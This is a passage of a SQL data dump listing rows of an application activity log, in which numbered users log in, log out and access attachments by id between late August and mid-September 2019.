16:14:29','2019-08-30 16:14:29',NULL),(20477,2,'Attachment',757,'2019-09-02 08:21:52','2019-09-02 08:21:52',NULL),(20478,2,'Attachment',29,'2019-09-02 08:21:53','2019-09-02 08:21:53',NULL),(20479,2,'Attachment',416,'2019-09-02 08:21:53','2019-09-02 08:21:53',NULL),(20480,2,'Attachment',419,'2019-09-02 08:21:53','2019-09-02 08:21:53',NULL),(20481,2,'Attachment',24,'2019-09-02 08:21:53','2019-09-02 08:21:53',NULL),(20482,2,'Attachment',288,'2019-09-02 08:21:53','2019-09-02 08:21:53',NULL),(20483,2,'Attachment',181,'2019-09-02 08:21:53','2019-09-02 08:21:53',NULL),(20484,2,'Attachment',757,'2019-09-02 08:55:35','2019-09-02 08:55:35',NULL),(20485,2,'Attachment',29,'2019-09-02 08:55:35','2019-09-02 08:55:35',NULL),(20486,2,'Attachment',24,'2019-09-02 08:55:35','2019-09-02 08:55:35',NULL),(20487,2,'Attachment',416,'2019-09-02 08:55:36','2019-09-02 08:55:36',NULL),(20488,2,'Attachment',419,'2019-09-02 08:55:36','2019-09-02 08:55:36',NULL),(20489,2,'Attachment',288,'2019-09-02 08:55:36','2019-09-02 08:55:36',NULL),(20490,2,'Attachment',181,'2019-09-02 08:55:36','2019-09-02 08:55:36',NULL),(20491,50,'Login',50,'2019-09-02 08:55:40','2019-09-02 08:55:40',NULL),(20492,50,'Attachment',518,'2019-09-02 09:47:33','2019-09-02 09:47:33',NULL),(20493,2,'Attachment',541,'2019-09-02 09:51:03','2019-09-02 09:51:03',NULL),(20494,2,'Attachment',539,'2019-09-02 09:51:03','2019-09-02 09:51:03',NULL),(20495,2,'Attachment',538,'2019-09-02 09:51:03','2019-09-02 09:51:03',NULL),(20496,2,'Attachment',535,'2019-09-02 09:51:03','2019-09-02 09:51:03',NULL),(20497,2,'Attachment',403,'2019-09-02 09:51:04','2019-09-02 09:51:04',NULL),(20498,50,'Attachment',761,'2019-09-02 10:04:16','2019-09-02 10:04:16',NULL),(20499,2,'Attachment',757,'2019-09-02 10:30:49','2019-09-02 10:30:49',NULL),(20500,2,'Attachment',24,'2019-09-02 10:30:49','2019-09-02 10:30:49',NULL),(20501,2,'Attachment',288,'2019-09-02 10:30:49','2019-09-02 10:30:49',NULL),(20502,2,'Attachment',181,'2019-09-02 10:30:49','2019-09-02 10:30:49',NULL),(20503,2,'Attachment',29,'2019-09-02 10:30:49','2019-09-02 10:30:49',NULL),(20504,2,'Attachment',416,'2019-09-02 10:30:49','2019-09-02 10:30:49',NULL),(20505,2,'Attachment',419,'2019-09-02 10:30:50','2019-09-02 10:30:50',NULL),(20506,2,'Attachment',757,'2019-09-02 17:57:18','2019-09-02 17:57:18',NULL),(20507,2,'Attachment',29,'2019-09-02 17:57:18','2019-09-02 17:57:18',NULL),(20508,2,'Attachment',24,'2019-09-02 17:57:18','2019-09-02 17:57:18',NULL),(20509,2,'Attachment',416,'2019-09-02 17:57:18','2019-09-02 17:57:18',NULL),(20510,2,'Attachment',419,'2019-09-02 17:57:18','2019-09-02 17:57:18',NULL),(20511,2,'Attachment',288,'2019-09-02 17:57:18','2019-09-02 17:57:18',NULL),(20512,2,'Attachment',181,'2019-09-02 17:57:18','2019-09-02 17:57:18',NULL),(20513,2,'Attachment',757,'2019-09-03 09:35:25','2019-09-03 09:35:25',NULL),(20514,2,'Attachment',29,'2019-09-03 09:35:25','2019-09-03 09:35:25',NULL),(20515,2,'Attachment',24,'2019-09-03 09:35:25','2019-09-03 09:35:25',NULL),(20516,2,'Attachment',416,'2019-09-03 09:35:25','2019-09-03 09:35:25',NULL),(20517,2,'Attachment',419,'2019-09-03 09:35:25','2019-09-03 09:35:25',NULL),(20518,2,'Attachment',288,'2019-09-03 09:35:26','2019-09-03 09:35:26',NULL),(20519,2,'Attachment',181,'2019-09-03 09:35:26','2019-09-03 09:35:26',NULL),(20520,2,'Attachment',757,'2019-09-03 13:50:21','2019-09-03 13:50:21',NULL),(20521,2,'Attachment',29,'2019-09-03 13:50:21','2019-09-03 13:50:21',NULL),(20522,2,'Attachment',416,'2019-09-03 13:50:21','2019-09-03 13:50:21',NULL),(20523,2,'Attachment',24,'2019-09-03 13:50:21','2019-09-03 13:50:21',NULL),(20524,2,'Attachment',419,'2019-09-03 13:50:21','2019-09-03 13:50:21',NULL),(20525,2,'Attachment',288,'2019-09-03 13:50:21','2019-09-03 13:50:21',NULL),(20526,2,'Attachment',181,'2019-09-03 13:50:21','2019-09-03 13:50:21',NULL),(20527,2,'Attachment',541,'2019-09-03 13:50:27','2019-09-03 13:50:27',NULL),(20528,2,'Attachment',539,'2019-09-03 13:50:27','2019-09-03 13:50:27',NULL),(20529,2,'Attachment',538,'2019-09-03 13:50:27','2019-09-03 13:50:27',NULL),(20530,2,'Attachment',535,'2019-09-03 13:50:27','2019-09-03 13:50:27',NULL),(20531,2,'Attachment',403,'2019-09-03 13:50:27','2019-09-03 13:50:27',NULL),(20532,2,'Attachment',354,'2019-09-03 13:50:28','2019-09-03 13:50:28',NULL),(20533,2,'Attachment',371,'2019-09-03 13:50:28','2019-09-03 13:50:28',NULL),(20534,2,'Attachment',69,'2019-09-03 13:50:28','2019-09-03 13:50:28',NULL),(20535,2,'Attachment',180,'2019-09-03 13:50:28','2019-09-03 13:50:28',NULL),(20536,2,'Attachment',14,'2019-09-03 13:50:28','2019-09-03 13:50:28',NULL),(20537,2,'Attachment',36,'2019-09-03 13:50:28','2019-09-03 13:50:28',NULL),(20538,2,'Attachment',546,'2019-09-03 13:50:39','2019-09-03 13:50:39',NULL),(20539,2,'Attachment',753,'2019-09-03 13:50:39','2019-09-03 13:50:39',NULL),(20540,2,'Attachment',755,'2019-09-03 13:50:41','2019-09-03 13:50:41',NULL),(20541,50,'Login',50,'2019-09-03 13:51:03','2019-09-03 13:51:03',NULL),(20542,2,'Attachment',29,'2019-09-05 08:08:08','2019-09-05 08:08:08',NULL),(20543,2,'Attachment',24,'2019-09-05 08:08:08','2019-09-05 08:08:08',NULL),(20544,2,'Attachment',757,'2019-09-05 08:08:08','2019-09-05 08:08:08',NULL),(20545,2,'Attachment',416,'2019-09-05 08:08:08','2019-09-05 08:08:08',NULL),(20546,2,'Attachment',419,'2019-09-05 08:08:08','2019-09-05 08:08:08',NULL),(20547,2,'Attachment',181,'2019-09-05 08:08:09','2019-09-05 08:08:09',NULL),(20548,2,'Attachment',288,'2019-09-05 08:08:09','2019-09-05 08:08:09',NULL),(20549,46,'Login',46,'2019-09-05 08:34:30','2019-09-05 08:34:30',NULL),(20550,50,'Login',50,'2019-09-05 08:57:02','2019-09-05 08:57:02',NULL),(20551,50,'Login',50,'2019-09-06 08:49:50','2019-09-06 08:49:50',NULL),(20552,50,'Logout',50,'2019-09-06 08:51:37','2019-09-06 08:51:37',NULL),(20553,20,'Login',20,'2019-09-06 08:51:42','2019-09-06 08:51:42',NULL),(20554,20,'Logout',20,'2019-09-06 09:05:27','2019-09-06 09:05:27',NULL),(20555,50,'Login',50,'2019-09-06 09:05:32','2019-09-06 09:05:32',NULL),(20556,2,'Attachment',757,'2019-09-06 09:38:13','2019-09-06 09:38:13',NULL),(20557,2,'Attachment',29,'2019-09-06 09:38:13','2019-09-06 09:38:13',NULL),(20558,2,'Attachment',24,'2019-09-06 09:38:13','2019-09-06 09:38:13',NULL),(20559,2,'Attachment',416,'2019-09-06 09:38:13','2019-09-06 09:38:13',NULL),(20560,2,'Attachment',419,'2019-09-06 09:38:13','2019-09-06 09:38:13',NULL),(20561,2,'Attachment',288,'2019-09-06 09:38:13','2019-09-06 09:38:13',NULL),(20562,2,'Attachment',181,'2019-09-06 09:38:14','2019-09-06 09:38:14',NULL),(20563,50,'Login',50,'2019-09-06 09:38:31','2019-09-06 09:38:31',NULL),(20564,2,'Attachment',757,'2019-09-06 15:11:06','2019-09-06 15:11:06',NULL),(20565,2,'Attachment',29,'2019-09-06 15:11:06','2019-09-06 15:11:06',NULL),(20566,2,'Attachment',416,'2019-09-06 15:11:06','2019-09-06 15:11:06',NULL),(20567,2,'Attachment',24,'2019-09-06 15:11:06','2019-09-06 15:11:06',NULL),(20568,2,'Attachment',288,'2019-09-06 15:11:06','2019-09-06 15:11:06',NULL),(20569,2,'Attachment',419,'2019-09-06 15:11:06','2019-09-06 15:11:06',NULL),(20570,2,'Attachment',181,'2019-09-06 15:11:06','2019-09-06 15:11:06',NULL),(20571,2,'Attachment',354,'2019-09-07 08:53:12','2019-09-07 08:53:12',NULL),(20572,2,'Attachment',180,'2019-09-07 08:53:12','2019-09-07 08:53:12',NULL),(20573,50,'Login',50,'2019-09-07 13:55:35','2019-09-07 13:55:35',NULL),(20574,50,'Attachment',753,'2019-09-07 16:32:28','2019-09-07 16:32:28',NULL),(20575,50,'Attachment',546,'2019-09-07 16:32:28','2019-09-07 16:32:28',NULL),(20576,2,'Attachment',757,'2019-09-08 16:57:48','2019-09-08 16:57:48',NULL),(20577,2,'Attachment',419,'2019-09-08 16:57:48','2019-09-08 16:57:48',NULL),(20578,2,'Attachment',29,'2019-09-08 16:57:48','2019-09-08 16:57:48',NULL),(20579,2,'Attachment',416,'2019-09-08 16:57:48','2019-09-08 16:57:48',NULL),(20580,2,'Attachment',24,'2019-09-08 16:57:48','2019-09-08 16:57:48',NULL),(20581,2,'Attachment',288,'2019-09-08 16:57:48','2019-09-08 16:57:48',NULL),(20582,2,'Attachment',181,'2019-09-08 16:57:49','2019-09-08 16:57:49',NULL),(20583,50,'Login',50,'2019-09-09 08:47:10','2019-09-09 08:47:10',NULL),(20584,50,'Logout',50,'2019-09-09 08:58:08','2019-09-09 08:58:08',NULL),(20585,2,'Attachment',757,'2019-09-09 08:58:09','2019-09-09 08:58:09',NULL),(20586,2,'Attachment',288,'2019-09-09 08:58:09','2019-09-09 08:58:09',NULL),(20587,2,'Attachment',24,'2019-09-09 08:58:09','2019-09-09 08:58:09',NULL),(20588,2,'Attachment',181,'2019-09-09 08:58:09','2019-09-09 08:58:09',NULL),(20589,2,'Attachment',416,'2019-09-09 08:58:09','2019-09-09 08:58:09',NULL),(20590,2,'Attachment',419,'2019-09-09 08:58:09','2019-09-09 08:58:09',NULL),(20591,20,'Login',20,'2019-09-09 08:58:13','2019-09-09 08:58:13',NULL),(20592,20,'Logout',20,'2019-09-09 08:58:59','2019-09-09 08:58:59',NULL),(20593,2,'Attachment',29,'2019-09-09 08:58:59','2019-09-09 08:58:59',NULL),(20594,50,'Login',50,'2019-09-09 08:59:03','2019-09-09 08:59:03',NULL),(20595,26,'Login',26,'2019-09-09 13:46:23','2019-09-09 13:46:23',NULL),(20596,26,'Attachment',29,'2019-09-09 13:47:30','2019-09-09 13:47:30',NULL),(20597,26,'Attachment',757,'2019-09-09 13:47:30','2019-09-09 13:47:30',NULL),(20598,26,'Attachment',416,'2019-09-09 13:47:30','2019-09-09 13:47:30',NULL),(20599,26,'Attachment',24,'2019-09-09 13:47:30','2019-09-09 13:47:30',NULL),(20600,26,'Attachment',419,'2019-09-09 13:47:30','2019-09-09 13:47:30',NULL),(20601,26,'Attachment',288,'2019-09-09 13:47:30','2019-09-09 13:47:30',NULL),(20602,26,'Attachment',181,'2019-09-09 13:47:30','2019-09-09 13:47:30',NULL),(20603,26,'Attachment',29,'2019-09-09 13:54:25','2019-09-09 13:54:25',NULL),(20604,26,'Login',26,'2019-09-09 14:07:07','2019-09-09 14:07:07',NULL),(20605,26,'Attachment',757,'2019-09-09 14:42:37','2019-09-09 14:42:37',NULL),(20606,26,'Attachment',29,'2019-09-09 14:42:37','2019-09-09 14:42:37',NULL),(20607,26,'Attachment',24,'2019-09-09 14:42:37','2019-09-09 14:42:37',NULL),(20608,26,'Attachment',416,'2019-09-09 14:42:37','2019-09-09 14:42:37',NULL),(20609,26,'Attachment',288,'2019-09-09 14:42:37','2019-09-09 14:42:37',NULL),(20610,26,'Attachment',181,'2019-09-09 14:42:37','2019-09-09 14:42:37',NULL),(20611,26,'Attachment',419,'2019-09-09 14:42:37','2019-09-09 14:42:37',NULL),(20612,2,'Attachment',757,'2019-09-09 16:47:29','2019-09-09 16:47:29',NULL),(20613,2,'Attachment',29,'2019-09-09 16:47:29','2019-09-09 16:47:29',NULL),(20614,2,'Attachment',24,'2019-09-09 16:47:30','2019-09-09 16:47:30',NULL),(20615,2,'Attachment',416,'2019-09-09 16:47:30','2019-09-09 16:47:30',NULL),(20616,2,'Attachment',419,'2019-09-09 16:47:30','2019-09-09 16:47:30',NULL),(20617,2,'Attachment',288,'2019-09-09 16:47:30','2019-09-09 16:47:30',NULL),(20618,2,'Attachment',181,'2019-09-09 16:47:30','2019-09-09 16:47:30',NULL),(20619,2,'Attachment',24,'2019-09-09 17:56:13','2019-09-09 17:56:13',NULL),(20620,26,'Login',26,'2019-09-09 22:22:43','2019-09-09 22:22:43',NULL),(20621,2,'Attachment',757,'2019-09-10 14:47:30','2019-09-10 14:47:30',NULL),(20622,2,'Attachment',24,'2019-09-10 14:47:31','2019-09-10 14:47:31',NULL),(20623,2,'Attachment',29,'2019-09-10 14:47:31','2019-09-10 14:47:31',NULL),(20624,2,'Attachment',419,'2019-09-10 14:47:32','2019-09-10 14:47:32',NULL),(20625,2,'Attachment',416,'2019-09-10 14:47:32','2019-09-10 14:47:32',NULL),(20626,2,'Attachment',288,'2019-09-10 14:47:33','2019-09-10 14:47:33',NULL),(20627,2,'Attachment',181,'2019-09-10 14:47:33','2019-09-10 14:47:33',NULL),(20628,2,'Attachment',757,'2019-09-11 16:09:37','2019-09-11 16:09:37',NULL),(20629,2,'Attachment',29,'2019-09-11 16:09:37','2019-09-11 16:09:37',NULL),(20630,2,'Attachment',24,'2019-09-11 16:09:37','2019-09-11 16:09:37',NULL),(20631,2,'Attachment',416,'2019-09-11 16:09:37','2019-09-11 16:09:37',NULL),(20632,2,'Attachment',288,'2019-09-11 16:09:37','2019-09-11 16:09:37',NULL),(20633,2,'Attachment',419,'2019-09-11 16:09:37','2019-09-11 16:09:37',NULL),(20634,2,'Attachment',181,'2019-09-11 16:09:37','2019-09-11 16:09:37',NULL),(20635,2,'Attachment',757,'2019-09-12 08:58:52','2019-09-12 08:58:52',NULL),(20636,2,'Attachment',29,'2019-09-12 08:58:52','2019-09-12 08:58:52',NULL),(20637,2,'Attachment',24,'2019-09-12 08:58:52','2019-09-12 08:58:52',NULL),(20638,2,'Attachment',416,'2019-09-12 08:58:52','2019-09-12 08:58:52',NULL),(20639,2,'Attachment',419,'2019-09-12 08:58:52','2019-09-12 08:58:52',NULL),(20640,2,'Attachment',288,'2019-09-12 08:58:52','2019-09-12 08:58:52',NULL),(20641,2,'Attachment',181,'2019-09-12 08:58:52','2019-09-12 08:58:52',NULL),(20642,52,'Login',52,'2019-09-12 09:00:00','2019-09-12 09:00:00',NULL),(20643,2,'Attachment',29,'2019-09-12 09:50:40','2019-09-12 09:50:40',NULL),(20644,2,'Attachment',757,'2019-09-12 09:50:40','2019-09-12 09:50:40',NULL),(20645,2,'Attachment',419,'2019-09-12 09:50:40','2019-09-12 09:50:40',NULL),(20646,2,'Attachment',24,'2019-09-12 09:50:40','2019-09-12 09:50:40',NULL),(20647,2,'Attachment',416,'2019-09-12 09:50:40','2019-09-12 09:50:40',NULL),(20648,2,'Attachment',288,'2019-09-12 09:50:40','2019-09-12 09:50:40',NULL),(20649,2,'Attachment',181,'2019-09-12 09:50:41','2019-09-12 09:50:41',NULL),(20650,2,'Attachment',757,'2019-09-12 10:31:26','2019-09-12 10:31:26',NULL),(20651,2,'Attachment',29,'2019-09-12 10:31:28','2019-09-12 10:31:28',NULL),(20652,2,'Attachment',419,'2019-09-12 10:31:28','2019-09-12 10:31:28',NULL),(20653,2,'Attachment',24,'2019-09-12 10:31:28','2019-09-12 10:31:28',NULL),(20654,2,'Attachment',416,'2019-09-12 10:31:28','2019-09-12 10:31:28',NULL),(20655,2,'Attachment',288,'2019-09-12 10:31:30','2019-09-12 10:31:30',NULL),(20656,2,'Attachment',181,'2019-09-12 10:31:30','2019-09-12 10:31:30',NULL),(20657,55,'Login',55,'2019-09-12 13:15:41','2019-09-12 13:15:41',NULL),(20658,55,'Attachment',181,'2019-09-12 13:15:46','2019-09-12 13:15:46',NULL),(20659,55,'Attachment',541,'2019-09-12 13:15:50','2019-09-12 13:15:50',NULL),(20660,55,'Attachment',538,'2019-09-12 13:15:50','2019-09-12 13:15:50',NULL),(20661,55,'Attachment',539,'2019-09-12 13:15:50','2019-09-12 13:15:50',NULL),(20662,55,'Attachment',535,'2019-09-12 13:15:50','2019-09-12 13:15:50',NULL),(20663,55,'Attachment',403,'2019-09-12 13:15:50','2019-09-12 13:15:50',NULL),(20664,52,'Attachment',541,'2019-09-12 13:53:35','2019-09-12 13:53:35',NULL),(20665,52,'Attachment',403,'2019-09-12 13:53:35','2019-09-12 13:53:35',NULL),(20666,52,'Attachment',538,'2019-09-12 13:53:35','2019-09-12 13:53:35',NULL),(20667,52,'Attachment',539,'2019-09-12 13:53:35','2019-09-12 13:53:35',NULL),(20668,52,'Attachment',535,'2019-09-12 13:53:35','2019-09-12 13:53:35',NULL),(20669,2,'Attachment',757,'2019-09-16 10:00:59','2019-09-16 10:00:59',NULL),(20670,2,'Attachment',29,'2019-09-16 10:00:59','2019-09-16 10:00:59',NULL),(20671,2,'Attachment',24,'2019-09-16 10:00:59','2019-09-16 10:00:59',NULL),(20672,2,'Attachment',416,'2019-09-16 10:00:59','2019-09-16 10:00:59',NULL),(20673,2,'Attachment',419,'2019-09-16 10:00:59','2019-09-16 10:00:59',NULL),(20674,2,'Attachment',288,'2019-09-16 10:00:59','2019-09-16 10:00:59',NULL),(20675,2,'Attachment',181,'2019-09-16 10:00:59','2019-09-16 10:00:59',NULL),(20676,55,'Login',55,'2019-09-16 10:01:10','2019-09-16 10:01:10',NULL),(20677,55,'Attachment',757,'2019-09-16 10:01:16','2019-09-16 10:01:16',NULL),(20678,55,'Attachment',29,'2019-09-16 10:01:16','2019-09-16 10:01:16',NULL),(20679,55,'Attachment',757,'2019-09-16 10:08:35','2019-09-16 10:08:35',NULL),(20680,55,'Attachment',24,'2019-09-16 10:08:35','2019-09-16 10:08:35',NULL),(20681,55,'Attachment',29,'2019-09-16 10:08:35','2019-09-16 10:08:35',NULL),(20682,55,'Attachment',419,'2019-09-16 10:08:35','2019-09-16 10:08:35',NULL),(20683,55,'Attachment',416,'2019-09-16 10:08:35','2019-09-16 10:08:35',NULL),(20684,55,'Attachment',24,'2019-09-16 10:08:39','2019-09-16 10:08:39',NULL),(20685,55,'Attachment',419,'2019-09-16 10:08:39','2019-09-16 10:08:39',NULL),(20686,55,'Attachment',416,'2019-09-16 10:08:39','2019-09-16 10:08:39',NULL),(20687,55,'Attachment',288,'2019-09-16 10:08:39','2019-09-16 10:08:39',NULL),(20688,55,'Attachment',181,'2019-09-16 10:08:39','2019-09-16 10:08:39',NULL),(20689,55,'Attachment',757,'2019-09-16 10:09:12','2019-09-16 10:09:12',NULL),(20690,55,'Attachment',29,'2019-09-16 10:09:12','2019-09-16 10:09:12',NULL),(20691,55,'Attachment',24,'2019-09-16 10:09:12','2019-09-16 10:09:12',NULL),(20692,55,'Attachment',416,'2019-09-16 10:09:12','2019-09-16 10:09:12',NULL),(20693,55,'Attachment',288,'2019-09-16 10:09:12','2019-09-16 10:09:12',NULL),(20694,55,'Attachment',757,'2019-09-16 10:12:39','2019-09-16 10:12:39',NULL),(20695,55,'Attachment',29,'2019-09-16 10:12:39','2019-09-16 10:12:39',NULL),(20696,55,'Attachment',24,'2019-09-16 10:12:39','2019-09-16 10:12:39',NULL),(20697,55,'Attachment',416,'2019-09-16 10:12:39','2019-09-16 10:12:39',NULL),(20698,55,'Attachment',419,'2019-09-16 10:12:39','2019-09-16 10:12:39',NULL),(20699,56,'Logout',56,'2019-09-16 10:19:42','2019-09-16 10:19:42',NULL),(20700,52,'Login',52,'2019-09-16 10:20:15','2019-09-16 10:20:15',NULL),(20701,55,'Attachment',757,'2019-09-16 10:23:22','2019-09-16 10:23:22',NULL),(20702,55,'Attachment',29,'2019-09-16 10:23:22','2019-09-16 10:23:22',NULL),(20703,2,'Attachment',757,'2019-09-16 10:29:43','2019-09-16 10:29:43',NULL),(20704,2,'Attachment',29,'2019-09-16 10:29:43','2019-09-16 10:29:43',NULL),(20705,2,'Attachment',181,'2019-09-16 10:29:43','2019-09-16 10:29:43',NULL),(20706,2,'Attachment',416,'2019-09-16 10:29:43','2019-09-16 10:29:43',NULL),(20707,2,'Attachment',24,'2019-09-16 10:29:43','2019-09-16 10:29:43',NULL),(20708,2,'Attachment',288,'2019-09-16 10:29:44','2019-09-16 10:29:44',NULL),(20709,2,'Attachment',419,'2019-09-16 10:29:44','2019-09-16 10:29:44',NULL),(20710,56,'Login',56,'2019-09-16 10:29:59','2019-09-16 10:29:59',NULL),(20711,2,'Attachment',757,'2019-09-16 10:34:40','2019-09-16 10:34:40',NULL),(20712,2,'Attachment',29,'2019-09-16 10:34:40','2019-09-16 10:34:40',NULL),(20713,2,'Attachment',24,'2019-09-16 10:34:40','2019-09-16 10:34:40',NULL),(20714,2,'Attachment',416,'2019-09-16 10:34:40','2019-09-16 10:34:40',NULL),(20715,2,'Attachment',419,'2019-09-16 10:34:40','2019-09-16 10:34:40',NULL),(20716,2,'Attachment',288,'2019-09-16 10:34:40','2019-09-16 10:34:40',NULL),(20717,2,'Attachment',181,'2019-09-16 10:34:40','2019-09-16 10:34:40',NULL),(20718,50,'Login',50,'2019-09-16 10:35:32','2019-09-16 10:35:32',NULL),(20719,50,'Logout',50,'2019-09-16 10:36:22','2019-09-16 10:36:22',NULL),(20720,49,'Login',49,'2019-09-16 10:36:46','2019-09-16 10:36:46',NULL),(20721,2,'Attachment',757,'2019-09-16 10:42:08','2019-09-16 10:42:08',NULL),(20722,2,'Attachment',29,'2019-09-16 10:42:08','2019-09-16 10:42:08',NULL),(20723,2,'Attachment',24,'2019-09-16 10:42:08','2019-09-16 10:42:08',NULL),(20724,2,'Attachment',416,'2019-09-16 10:42:08','2019-09-16 10:42:08',NULL),(20725,2,'Attachment',419,'2019-09-16 10:42:08','2019-09-16 10:42:08',NULL),(20726,2,'Attachment',288,'2019-09-16 10:42:09','2019-09-16 10:42:09',NULL),(20727,2,'Attachment',181,'2019-09-16 10:42:09','2019-09-16 10:42:09',NULL),(20728,50,'Login',50,'2019-09-16 10:42:24','2019-09-16 10:42:24',NULL),(20729,50,'Login',50,'2019-09-16 13:42:03','2019-09-16 13:42:03',NULL),(20730,50,'Logout',50,'2019-09-16 13:44:54','2019-09-16 13:44:54',NULL),(20731,50,'Login',50,'2019-09-16 13:44:59','2019-09-16 13:44:59',NULL),(20732,50,'Logout',50,'2019-09-16 13:45:21','2019-09-16 13:45:21',NULL),(20733,53,'Login',53,'2019-09-16 13:45:26','2019-09-16 13:45:26',NULL),(20734,52,'Login',52,'2019-09-16 13:46:11','2019-09-16 13:46:11',NULL),(20735,53,'Logout',53,'2019-09-16 13:47:18','2019-09-16 13:47:18',NULL),(20736,16,'Login',16,'2019-09-16 13:47:23','2019-09-16 13:47:23',NULL),(20737,2,'Attachment',757,'2019-09-16 13:49:15','2019-09-16 13:49:15',NULL),(20738,2,'Attachment',29,'2019-09-16 13:49:15','2019-09-16 13:49:15',NULL),(20739,2,'Attachment',416,'2019-09-16 13:49:15','2019-09-16 13:49:15',NULL),(20740,2,'Attachment',24,'2019-09-16 13:49:15','2019-09-16 13:49:15',NULL),(20741,2,'Attachment',419,'2019-09-16 13:49:15','2019-09-16 13:49:15',NULL),(20742,2,'Attachment',288,'2019-09-16 13:49:15','2019-09-16 13:49:15',NULL),(20743,2,'Attachment',181,'2019-09-16 13:49:15','2019-09-16 13:49:15',NULL),(20744,8,'Login',8,'2019-09-16 13:49:45','2019-09-16 13:49:45',NULL),(20745,8,'Logout',8,'2019-09-16 13:53:22','2019-09-16 13:53:22',NULL),(20746,52,'Logout',52,'2019-09-16 13:57:00','2019-09-16 13:57:00',NULL),(20747,8,'Login',8,'2019-09-16 14:06:32','2019-09-16 14:06:32',NULL),(20748,52,'Login',52,'2019-09-16 14:12:59','2019-09-16 14:12:59',NULL),(20749,52,'Logout',52,'2019-09-16 14:13:08','2019-09-16 14:13:08',NULL),(20750,48,'Login',48,'2019-09-16 14:13:32','2019-09-16 14:13:32',NULL),(20751,48,'Logout',48,'2019-09-16 15:17:23','2019-09-16 15:17:23',NULL),(20752,8,'Logout',8,'2019-09-16 15:36:03','2019-09-16 15:36:03',NULL),(20753,52,'Login',52,'2019-09-16 15:36:22','2019-09-16 15:36:22',NULL),(20754,2,'Attachment',29,'2019-09-17 10:06:56','2019-09-17 10:06:56',NULL),(20755,2,'Attachment',419,'2019-09-17 10:06:57','2019-09-17 10:06:57',NULL),(20756,2,'Attachment',181,'2019-09-17 10:06:57','2019-09-17 10:06:57',NULL),(20757,2,'Attachment',757,'2019-09-17 10:09:29','2019-09-17 10:09:29',NULL),(20758,2,'Attachment',24,'2019-09-17 10:09:29','2019-09-17 10:09:29',NULL),(20759,2,'Attachment',416,'2019-09-17 10:09:29','2019-09-17 10:09:29',NULL),(20760,2,'Attachment',29,'2019-09-17 10:09:29','2019-09-17 10:09:29',NULL),(20761,2,'Attachment',419,'2019-09-17 10:09:29','2019-09-17 10:09:29',NULL),(20762,2,'Attachment',288,'2019-09-17 10:09:29','2019-09-17 10:09:29',NULL),(20763,2,'Attachment',181,'2019-09-17 10:09:29','2019-09-17 10:09:29',NULL),(20764,2,'Attachment',757,'2019-09-17 10:23:32','2019-09-17 10:23:32',NULL),(20765,2,'Attachment',29,'2019-09-17 10:23:32','2019-09-17 10:23:32',NULL),(20766,2,'Attachment',24,'2019-09-17 10:23:32','2019-09-17 10:23:32',NULL),(20767,2,'Attachment',416,'2019-09-17 10:23:32','2019-09-17 10:23:32',NULL),(20768,2,'Attachment',419,'2019-09-17 10:23:32','2019-09-17 10:23:32',NULL),(20769,2,'Attachment',288,'2019-09-17 10:23:32','2019-09-17 10:23:32',NULL),(20770,2,'Attachment',181,'2019-09-17 10:23:32','2019-09-17 10:23:32',NULL),(20771,53,'Login',53,'2019-09-17 10:24:25','2019-09-17 10:24:25',NULL),(20772,2,'Attachment',24,'2019-09-17 11:17:31','2019-09-17 11:17:31',NULL),(20773,2,'Attachment',29,'2019-09-17 11:17:31','2019-09-17 11:17:31',NULL),(20774,2,'Attachment',757,'2019-09-17 11:17:31','2019-09-17 11:17:31',NULL),(20775,2,'Attachment',419,'2019-09-17 11:17:31','2019-09-17 11:17:31',NULL),(20776,2,'Attachment',416,'2019-09-17 11:17:31','2019-09-17 11:17:31',NULL),(20777,2,'Attachment',757,'2019-09-17 13:45:14','2019-09-17 13:45:14',NULL),(20778,2,'Attachment',29,'2019-09-17 13:45:15','2019-09-17 13:45:15',NULL),(20779,2,'Attachment',24,'2019-09-17 13:45:15','2019-09-17 13:45:15',NULL),(20780,2,'Attachment',416,'2019-09-17 13:45:15','2019-09-17 13:45:15',NULL),(20781,2,'Attachment',419,'2019-09-17 13:45:15','2019-09-17 13:45:15',NULL),(20782,2,'Attachment',288,'2019-09-17 13:45:15','2019-09-17 13:45:15',NULL),(20783,2,'Attachment',181,'2019-09-17 13:45:15','2019-09-17 13:45:15',NULL),(20784,2,'Attachment',757,'2019-09-17 15:54:53','2019-09-17 15:54:53',NULL),(20785,2,'Attachment',29,'2019-09-17 15:54:53','2019-09-17 15:54:53',NULL),(20786,2,'Attachment',24,'2019-09-17 15:54:53','2019-09-17 15:54:53',NULL),(20787,2,'Attachment',416,'2019-09-17 15:54:53','2019-09-17 15:54:53',NULL),(20788,2,'Attachment',419,'2019-09-17 15:54:53','2019-09-17 15:54:53',NULL),(20789,2,'Attachment',288,'2019-09-17 15:54:53','2019-09-17 15:54:53',NULL),(20790,2,'Attachment',181,'2019-09-17 15:54:53','2019-09-17 15:54:53',NULL),(20791,16,'Login',16,'2019-09-17 16:17:00','2019-09-17 16:17:00',NULL),(20792,2,'Attachment',29,'2019-09-17 16:44:29','2019-09-17 16:44:29',NULL),(20793,2,'Attachment',24,'2019-09-17 16:44:29','2019-09-17 16:44:29',NULL),(20794,52,'Login',52,'2019-09-18 09:35:40','2019-09-18 09:35:40',NULL),(20795,16,'Login',16,'2019-09-18 09:44:43','2019-09-18 09:44:43',NULL),(20796,52,'Login',52,'2019-09-18 18:19:57','2019-09-18 18:19:57',NULL),(20797,52,'Logout',52,'2019-09-18 18:20:18','2019-09-18 18:20:18',NULL),(20798,52,'Login',52,'2019-09-19 09:19:20','2019-09-19 09:19:20',NULL),(20799,52,'Login',52,'2019-09-19 10:13:52','2019-09-19 10:13:52',NULL),(20800,52,'Login',52,'2019-09-19 10:14:18','2019-09-19 10:14:18',NULL),(20801,2,'Attachment',757,'2019-09-19 14:16:11','2019-09-19 14:16:11',NULL),(20802,2,'Attachment',29,'2019-09-19 14:16:11','2019-09-19 14:16:11',NULL),(20803,2,'Attachment',24,'2019-09-19 14:16:11','2019-09-19 14:16:11',NULL),(20804,2,'Attachment',416,'2019-09-19 14:16:11','2019-09-19 14:16:11',NULL),(20805,2,'Attachment',419,'2019-09-19 14:16:11','2019-09-19 14:16:11',NULL),(20806,2,'Attachment',288,'2019-09-19 14:16:11','2019-09-19 14:16:11',NULL),(20807,2,'Attachment',181,'2019-09-19 14:16:11','2019-09-19 14:16:11',NULL),(20808,2,'Attachment',757,'2019-09-19 15:17:56','2019-09-19 15:17:56',NULL),(20809,2,'Attachment',29,'2019-09-19 15:17:56','2019-09-19 15:17:56',NULL),(20810,2,'Attachment',24,'2019-09-19 15:17:56','2019-09-19 15:17:56',NULL),(20811,2,'Attachment',416,'2019-09-19 15:17:56','2019-09-19 